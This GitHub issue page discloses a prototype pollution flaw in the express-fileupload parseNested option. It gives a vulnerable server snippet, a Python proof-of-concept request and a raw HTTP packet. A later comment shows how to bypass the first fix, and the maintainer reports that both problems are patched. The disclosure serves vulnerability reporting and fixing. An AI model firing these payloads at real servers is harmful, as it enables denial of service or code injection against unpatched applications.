Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Prototype Pollution #236

Closed
po6ix opened this issue Jul 29, 2020 · 5 comments · Fixed by #237
Closed

Prototype Pollution #236

po6ix opened this issue Jul 29, 2020 · 5 comments · Fixed by #237
Assignees
@richardgirges

Comments

@po6ix
Copy link

po6ix commented Jul 29, 2020

This module has prototype pollution vulnerablity
and it can make DOS with parseNested option.

server

const express = require('express');
const fileUpload = require('express-fileupload');
const app = express();

app.use(fileUpload({ parseNested: true }));

app.get('/', (req, res) => {
    res.end('express-fileupload poc');
});

app.listen(7777)

exploit

import requests

res = requests.post('http://p6.is:7777', files = {'__proto__.toString': 'express-fileupload poc'});

raw packet

POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=--------1566035451
Content-Length: 137

----------1566035451
Content-Disposition: form-data; name="__proto__.toString"; filename="filename"

content
----------1566035451--

Full description is in here
https://blog.p6.is/Real-World-JS-1/
@richardgirges richardgirges self-assigned this Jul 29, 2020
@richardgirges richardgirges mentioned this issue Jul 29, 2020
Merged
@richardgirges
Copy link
Owner

Thanks for reporting this. Fix has been applied and published to NPM: https://github.com/richardgirges/express-fileupload/releases/tag/1.1.8

@securityMB
Copy link

@richardgirges The fix can be bypassed. Instead of referencing __proto__.toString, one can reference constructor.prototype.toString.

@richardgirges
Copy link
Owner

Thanks @securityMB - it has been fixed and a second deprecation notice has been posted on NPM for all prior versions.

@ghost
Copy link

ghost commented Aug 5, 2020

https://www.bleepingcomputer.com/news/security/nodejs-module-downloaded-7m-times-lets-hackers-inject-code/ They just announced in the news about this today.. yet you claim to have fixed it 5 days ago.. love how far the news is behind on this.. thanks for the quick fix of this issue! Someone should contact the news folks..

@richardgirges
Copy link
Owner

Thanks for the heads up on this @naraphox

@AmazingMech2418 AmazingMech2418 mentioned this issue Aug 5, 2020
Closed
@mend-bolt-for-github mend-bolt-for-github bot mentioned this issue Aug 27, 2020
Open
@mend-bolt-for-github mend-bolt-for-github bot mentioned this issue Sep 8, 2020
Open
@mend-for-github-com mend-for-github-com bot mentioned this issue Nov 19, 2020
Closed
This was referenced Dec 1, 2020
Open
Open
This was referenced Mar 8, 2021
Open
Open
Closed
Closed
This was referenced Mar 18, 2021
Open
Open
@mend-for-github-com mend-for-github-com bot mentioned this issue Apr 21, 2021
Closed
@mend-for-github-com mend-for-github-com bot mentioned this issue Aug 19, 2021
Open
@github-actions github-actions bot mentioned this issue Aug 1, 2022
Open
@github-actions github-actions bot mentioned this issue Jun 6, 2024
Open
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees

@richardgirges richardgirges

Labels
None yet
Projects
None yet
Milestone
No milestone
Development

Successfully merging a pull request may close this issue.

Fix prototype pollution issue in processNested richardgirges/express-fileupload
3 participants
@richardgirges @securityMB @po6ix